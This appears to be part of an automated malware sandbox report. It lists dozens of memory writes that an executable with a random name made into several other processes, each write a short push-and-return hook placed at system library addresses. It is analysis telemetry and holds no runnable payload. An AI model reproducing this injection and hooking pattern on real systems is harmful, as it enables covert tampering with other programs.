Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74D6EA60 value: 68 13 B9 E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74D758A0 value: 68 4B B9 E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74D6DFF0 value: 68 6C B9 E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75A8EA50 value: 68 5D 12 E6 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75A8E8E0 value: 68 9A 12 E6 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75C0B390 value: 68 95 EE E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75C0B400 value: 68 C7 EE E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75BF7D00 value: 68 01 EF E5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 75509390 value: 68 FE CD E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74D8FF10 value: 68 B0 B4 E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 74D6A810 value: 68 20 B5 E7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 76F03710 value: 68 37 A4 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 76EDDE80 value: 68 A3 A5 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74DF4100 value: 68 AE A8 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74DF3330 value: 68 33 A9 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75AA4190 value: 68 99 A9 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75A90560 value: 68 B0 A9 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74D6EA60 value: 68 13 B9 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74D758A0 value: 68 4B B9 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74D6DFF0 value: 68 6C B9 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75A8EA50 value: 68 5D 12 41 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75A8E8E0 value: 68 9A 12 41 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75C0B390 value: 68 95 EE 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75C0B400 value: 68 C7 EE 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75BF7D00 value: 68 01 EF 40 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 75509390 value: 68 FE CD 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74D8FF10 value: 68 B0 B4 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 74D6A810 value: 68 20 B5 42 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 76F03710 value: 68 37 A4 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 76EDDE80 value: 68 A3 A5 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74DF4100 value: 68 AE A8 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74DF3330 value: 68 33 A9 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75AA4190 value: 68 99 A9 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75A90560 value: 68 B0 A9 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74D6EA60 value: 68 13 B9 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74D758A0 value: 68 4B B9 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74D6DFF0 value: 68 6C B9 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75A8EA50 value: 68 5D 12 5E 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75A8E8E0 value: 68 9A 12 5E 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75C0B390 value: 68 95 EE 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75C0B400 value: 68 C7 EE 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75BF7D00 value: 68 01 EF 5D 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 75509390 value: 68 FE CD 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74D8FF10 value: 68 B0 B4 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 74D6A810 value: 68 20 B5 5F 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 76F03710 value: 68 37 A4 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 76EDDE80 value: 68 A3 A5 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74DF4100 value: 68 AE A8 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74DF3330 value: 68 33 A9 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75AA4190 value: 68 99 A9 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75A90560 value: 68 B0 A9 CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74D6EA60 value: 68 13 B9 CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74D758A0 value: 68 4B B9 CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74D6DFF0 value: 68 6C B9 CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75A8EA50 value: 68 5D 12 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75A8E8E0 value: 68 9A 12 CB 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75C0B390 value: 68 95 EE CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75C0B400 value: 68 C7 EE CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75BF7D00 value: 68 01 EF CA 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 75509390 value: 68 FE CD CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74D8FF10 value: 68 B0 B4 CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 74D6A810 value: 68 20 B5 CC 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 76F03710 value: 68 37 A4 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 76EDDE80 value: 68 A3 A5 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74DF4100 value: 68 AE A8 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74DF3330 value: 68 33 A9 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75AA4190 value: 68 99 A9 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75A90560 value: 68 B0 A9 C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74D6EA60 value: 68 13 B9 CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74D758A0 value: 68 4B B9 CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74D6DFF0 value: 68 6C B9 CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75A8EA50 value: 68 5D 12 CA 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75A8E8E0 value: 68 9A 12 CA 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75C0B390 value: 68 95 EE C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75C0B400 value: 68 C7 EE C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75BF7D00 value: 68 01 EF C9 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 75509390 value: 68 FE CD CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74D8FF10 value: 68 B0 B4 CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2008 base: 74D6A810 value: 68 20 B5 CB 00 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 76F03710 value: 68 37 A4 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 76EDDE80 value: 68 A3 A5 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74DF4100 value: 68 AE A8 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74DF3330 value: 68 33 A9 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75AA4190 value: 68 99 A9 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75A90560 value: 68 B0 A9 F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74D6EA60 value: 68 13 B9 F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74D758A0 value: 68 4B B9 F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74D6DFF0 value: 68 6C B9 F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75A8EA50 value: 68 5D 12 F6 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75A8E8E0 value: 68 9A 12 F6 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75C0B390 value: 68 95 EE F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75C0B400 value: 68 C7 EE F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75BF7D00 value: 68 01 EF F5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 75509390 value: 68 FE CD F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74D8FF10 value: 68 B0 B4 F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2496 base: 74D6A810 value: 68 20 B5 F7 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 76F03710 value: 68 37 A4 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 76EDDE80 value: 68 A3 A5 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74DF4100 value: 68 AE A8 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74DF3330 value: 68 33 A9 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75AA4190 value: 68 99 A9 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75A90560 value: 68 B0 A9 B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74D6EA60 value: 68 13 B9 B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74D758A0 value: 68 4B B9 B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74D6DFF0 value: 68 6C B9 B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75A8EA50 value: 68 5D 12 B4 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75A8E8E0 value: 68 9A 12 B4 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75C0B390 value: 68 95 EE B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75C0B400 value: 68 C7 EE B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75BF7D00 value: 68 01 EF B3 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 75509390 value: 68 FE CD B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74D8FF10 value: 68 B0 B4 B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4456 base: 74D6A810 value: 68 20 B5 B5 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 76F03710 value: 68 37 A4 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 76EDDE80 value: 68 A3 A5 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74DF4100 value: 68 AE A8 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74DF3330 value: 68 33 A9 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75AA4190 value: 68 99 A9 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75A90560 value: 68 B0 A9 39 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74D6EA60 value: 68 13 B9 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74D758A0 value: 68 4B B9 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 74D6DFF0 value: 68 6C B9 3B 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75A8EA50 value: 68 5D 12 3A 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75A8E8E0 value: 68 9A 12 3A 02 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 5608 base: 75C0B390 value: 68 95 EE 39 02 C3
